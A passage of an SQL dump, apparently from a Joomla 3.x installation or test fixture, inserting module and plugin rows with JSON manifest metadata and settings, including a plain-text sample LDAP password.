reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','{\"maximum\":\"5\",\"timeframe\":\"alltime\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(317,'mod_tags_similar','module','mod_tags_similar','',0,1,1,0,'{\"name\":\"mod_tags_similar\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_SIMILAR_XML_DESCRIPTION\",\"group\":\"\"}','{\"maximum\":\"5\",\"matchtype\":\"any\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(400,'plg_authentication_gmail','plugin','gmail','authentication',0,0,1,0,'{\"name\":\"plg_authentication_gmail\",\"type\":\"plugin\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_GMAIL_XML_DESCRIPTION\",\"group\":\"\"}','{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}','','',0,'0000-00-00 00:00:00',1,0),(401,'plg_authentication_joomla','plugin','joomla','authentication',0,1,1,1,'{\"name\":\"plg_authentication_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(402,'plg_authentication_ldap','plugin','ldap','authentication',0,0,1,0,'{\"name\":\"plg_authentication_ldap\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LDAP_XML_DESCRIPTION\",\"group\":\"\"}','{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}','','',0,'0000-00-00 00:00:00',3,0),(403,'plg_content_contact','plugin','contact','content',0,1,1,0,'{\"name\":\"plg_content_contact\",\"type\":\"plugin\",\"creationDate\":\"January 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.2\",\"description\":\"PLG_CONTENT_CONTACT_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',1,0),(404,'plg_content_emailcloak','plugin','emailcloak','content',0,1,1,0,'{\"name\":\"plg_content_emailcloak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_EMAILCLOAK_XML_DESCRIPTION\",\"group\":\"\"}','{\"mode\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(406,'plg_content_loadmodule','plugin','loadmodule','content',0,1,1,0,'{\"name\":\"plg_content_loadmodule\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOADMODULE_XML_DESCRIPTION\",\"group\":\"\"}','{\"style\":\"xhtml\"}','','',0,'2011-09-18 15:22:50',0,0),(407,'plg_content_pagebreak','plugin','pagebreak','content',0,1,1,0,'{\"name\":\"plg_content_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\"}','{\"title\":\"1\",\"multipage_toc\":\"1\",\"showall\":\"1\"}','','',0,'0000-00-00 00:00:00',4,0),(408,'plg_content_pagenavigation','plugin','pagenavigation','content',0,1,1,0,'{\"name\":\"plg_content_pagenavigation\",\"type\":\"plugin\",\"creationDate\":\"January 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_PAGENAVIGATION_XML_DESCRIPTION\",\"group\":\"\"}','{\"position\":\"1\"}','','',0,'0000-00-00 00:00:00',5,0),(409,'plg_content_vote','plugin','vote','content',0,1,1,0,'{\"name\":\"plg_content_vote\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_VOTE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',6,0),(410,'plg_editors_codemirror','plugin','codemirror','editors',0,1,1,1,'{\"name\":\"plg_editors_codemirror\",\"type\":\"plugin\",\"creationDate\":\"28 March 2011\",\"author\":\"Marijn Haverbeke\",\"copyright\":\"\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"\",\"version\":\"3.15\",\"description\":\"PLG_CODEMIRROR_XML_DESCRIPTION\",\"group\":\"\"}','{\"lineNumbers\":\"1\",\"lineWrapping\":\"1\",\"matchTags\":\"1\",\"matchBrackets\":\"1\",\"marker-gutter\":\"1\",\"autoCloseTags\":\"1\",\"autoCloseBrackets\":\"1\",\"autoFocus\":\"1\",\"theme\":\"default\",\"tabmode\":\"indent\"}','','',0,'0000-00-00 00:00:00',1,0),(411,'plg_editors_none','plugin','none','editors',0,1,1,1,'{\"name\":\"plg_editors_none\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"\",\"version\":\"3.0.0\",\"description\":\"PLG_NONE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',2,0),(412,'plg_editors_tinymce','plugin','tinymce','editors',0,1,1,0,'{\"name\":\"plg_editors_tinymce\",\"type\":\"plugin\",\"creationDate\":\"2005-2014\",\"author\":\"Moxiecode Systems AB\",\"copyright\":\"Moxiecode Systems AB\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"tinymce.moxiecode.com\",\"version\":\"4.1.2\",\"description\":\"PLG_TINY_XML_DESCRIPTION\",\"group\":\"\"}','{\"mode\":\"1\",\"skin\":\"0\",\"mobile\":\"0\",\"entity_encoding\":\"raw\",\"lang_mode\":\"1\",\"text_direction\":\"ltr\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"script,applet,iframe\",\"extended_elements\":\"\",\"html_height\":\"550\",\"html_width\":\"750\",\"resizing\":\"1\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"hr\":\"1\",\"link\":\"1\",\"media\":\"1\",\"print\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"alignment\":\"1\",\"visualchars\":\"1\",\"visualblocks\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"advlist\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"custom_plugin\":\"\",\"custom_button\":\"\"}','','',0,'0000-00-00 00:00:00',3,0),(413,'plg_editors-xtd_article','plugin','article','editors-xtd',0,1,1,1,'{\"name\":\"plg_editors-xtd_article\",\"type\":\"plugin\",\"creationDate\":\"October 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_ARTICLE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',1,0),(414,'plg_editors-xtd_image','plugin','image','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_image\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_IMAGE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',2,0),(415,'plg_editors-xtd_pagebreak','plugin','pagebreak','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EDITORSXTD_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',3,0),(416,'plg_editors-xtd_readmore','plugin','readmore','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_readmore\",\"type\":\"plugin\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_READMORE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',4,0),(417,'plg_search_categories','plugin','categories','search',0,1,1,0,'{\"name\":\"plg_search_categories\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(418,'plg_search_contacts','plugin','contacts','search',0,1,1,0,'{\"name\":\"plg_search_contacts\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTACTS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(419,'plg_search_content','plugin','content','search',0,1,1,0,'{\"name\":\"plg_search_content\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(420,'plg_search_newsfeeds','plugin','newsfeeds','search',0,1,1,0,'{\"name\":\"plg_search_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(421,'plg_search_weblinks','plugin','weblinks','search',0,1,1,0,'{\"name\":\"plg_search_weblinks\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(422,'plg_system_languagefilter','plugin','languagefilter','system',0,0,1,1,'{\"name\":\"plg_system_languagefilter\",\"type\":\"plugin\",\"creationDate\":\"July 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGEFILTER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',1,0),(423,'plg_system_p3p','plugin','p3p','system',0,1,1,0,'{\"name\":\"plg_system_p3p\",\"type\":\"plugin\",\"creationDate\":\"September 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_P3P_XML_DESCRIPTION\",\"group\":\"\"}','{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}','','',0,'0000-00-00 00:00:00',2,0),(424,'plg_system_cache','plugin','cache','system',0,0,1,1,'{\"name\":\"plg_system_cache\",\"type\":\"plugin\",\"creationDate\":\"February 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','{\"browsercache\":\"0\",\"cachetime\":\"15\"}','','',0,'0000-00-00 00:00:00',9,0),(425,'plg_system_debug','plugin','debug','system',0,1,1,0,'{\"name\":\"plg_system_debug\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_DEBUG_XML_DESCRIPTION\",\"group\":\"\"}','{\"profile\":\"1\",\"queries\":\"1\",\"memory\":\"1\",\"language_files\":\"1\",\"language_strings\":\"1\",\"strip-first\":\"1\",\"strip-prefix\":\"\",\"strip-suffix\":\"\"}','','',0,'0000-00-00 00:00:00',4,0),(426,'plg_system_log','plugin','log','system',0,1,1,1,'{\"name\":\"plg_system_log\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOG_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',5,0),(427,'plg_system_redirect','plugin','redirect','system',0,0,1,1,'{\"name\":\"plg_system_redirect\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',6,0),(428,'plg_system_remember','plugin','remember','system',0,1,1,1,'{\"name\":\"plg_system_remember\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REMEMBER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',7,0),(429,'plg_system_sef','plugin','sef','system',0,1,1,0,'{\"name\":\"plg_system_sef\",\"type\":\"plugin\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEF_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',8,0),(430,'plg_system_logout','plugin','logout','system',0,1,1,1,'{\"name\":\"plg_system_logout\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LOGOUT_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',3,0),(431,'plg_user_contactcreator','plugin','contactcreator','user',0,0,1,0,'{\"name\":\"plg_user_contactcreator\",\"type\":\"plugin\",\"creationDate\":\"August 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTACTCREATOR_XML_DESCRIPTION\",\"group\":\"\"}','{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(432,'plg_user_joomla','plugin','joomla','user',0,1,1,0,'{\"name\":\"plg_user_joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2009 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{\"strong_passwords\":\"1\",\"autoregister\":\"1\"}','','',0,'0000-00-00 00:00:00',2,0),(433,'plg_user_profile','plugin','profile','user',0,0,1,0,'{\"name\":\"plg_user_profile\",\"type\":\"plugin\",\"creationDate\":\"January 2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_PROFILE_XML_DESCRIPTION\",\"group\":\"\"}','{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"1\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_tos\":\"1\",\"profile-require_dob\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(434,'plg_extension_joomla','plugin','joomla','extension',0,1,1,1,'{\"name\":\"plg_extension_joomla\",\"type\":\"plugin\",\"creationDate\":\"May 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EXTENSION_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',1,0),(435,'plg_content_joomla','plugin','joomla','content',0,1,1,0,'{\"name\":\"plg_content_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(436,'plg_system_languagecode','plugin','languagecode','system',0,0,1,0,'{\"name\":\"plg_system_languagecode\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',10,0),(437,'plg_quickicon_joomlaupdate','plugin','joomlaupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_joomlaupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(438,'plg_quickicon_extensionupdate','plugin','extensionupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_extensionupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_EXTENSIONUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(439,'plg_captcha_recaptcha','plugin','recaptcha','captcha',0,0,1,0,'{\"name\":\"plg_captcha_recaptcha\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_XML_DESCRIPTION\",\"group\":\"\"}','{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}','','',0,'0000-00-00 00:00:00',0,0),(440,'plg_system_highlight','plugin','highlight','system',0,1,1,0,'{\"name\":\"plg_system_highlight\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_HIGHLIGHT_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',7,0),(441,'plg_content_finder','plugin','finder','content',0,0,1,0,'{\"name\":\"plg_content_finder\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(442,'plg_finder_categories','plugin','categories','finder',0,1,1,0,'{\"name\":\"plg_finder_categories\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',1,0),(443,'plg_finder_contacts','plugin','contacts','finder',0,1,1,0,'{\"name\":\"plg_finder_contacts\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTACTS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',2,0),(444,'plg_finder_content','plugin','content','finder',0,1,1,0,'{\"name\":\"plg_finder_content\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',3,0),(445,'plg_finder_newsfeeds','plugin','newsfeeds','finder',0,1,1,0,'{\"name\":\"plg_finder_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',4,0),(446,'plg_finder_weblinks','plugin','weblinks','finder',0,1,1,0,'{\"name\":\"plg_finder_weblinks\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',5,0),(447,'plg_finder_tags','plugin','tags','finder',0,1,1,0,'{\"name\":\"plg_finder_tags\",\"type\":\"plugin\",\"creationDate\":\"February 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_TAGS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(448,'plg_twofactorauth_totp','plugin','totp','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_totp\",\"type\":\"plugin\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_TOTP_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(449,'plg_authentication_cookie','plugin','cookie','authentication',0,1,1,0,'{\"name\":\"plg_authentication_cookie\",\"type\":\"plugin\",\"creationDate\":\"July 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights 